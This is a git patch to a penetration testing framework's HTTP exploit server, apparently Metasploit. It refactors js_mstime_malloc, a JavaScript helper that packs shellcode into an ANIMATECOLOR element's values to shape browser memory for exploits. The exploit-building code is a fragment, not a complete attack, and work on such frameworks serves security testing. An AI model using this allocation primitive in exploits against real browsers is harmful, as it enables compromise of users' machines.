From 3d2cb9ec3f43887a0ee60931eded74b5f0ee814b Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Wed, 1 May 2013 13:41:36 -0500
Subject: [PATCH] Uses rand_text_hex for RGB values, and correcting exception
 handling

---
 lib/msf/core/exploit/http/server.rb | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index bc368c0f13..e97d05c5a4 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -875,8 +875,6 @@ protected
 	#     </script>
 	#
 	def js_mstime_malloc
-		badchars = (0x47..0x5a).to_a.pack("C*") + (0x67..0x7a).to_a.pack("C*") 
-		rgb      = Rex::Text.rand_text_alphanumeric(6, badchars).downcase
 		%Q|
 		function mstime_malloc(oArg) {
 			shellcode     = oArg.shellcode;
@@ -896,15 +894,14 @@ protected
 					else        { buf += ";" + shellcode; }
 				}
 				else {
-					buf += ";##{rgb}";
+					buf += ";##{Rex::Text.rand_text_hex(6)}";
 				}
 			}
 
-			try {
-				e = document.getElementById(objId);
-				if (e == null) { throw "Invalid ANIMATECOLOR element"; }
-				e.values = buf;
-			} catch (e) {}
+			e = document.getElementById(objId);
+			if (e == null) { throw "Invalid ANIMATECOLOR element"; }
+			try { e.values = buf; }
+			catch (e) {}
 		}
 		|
 	end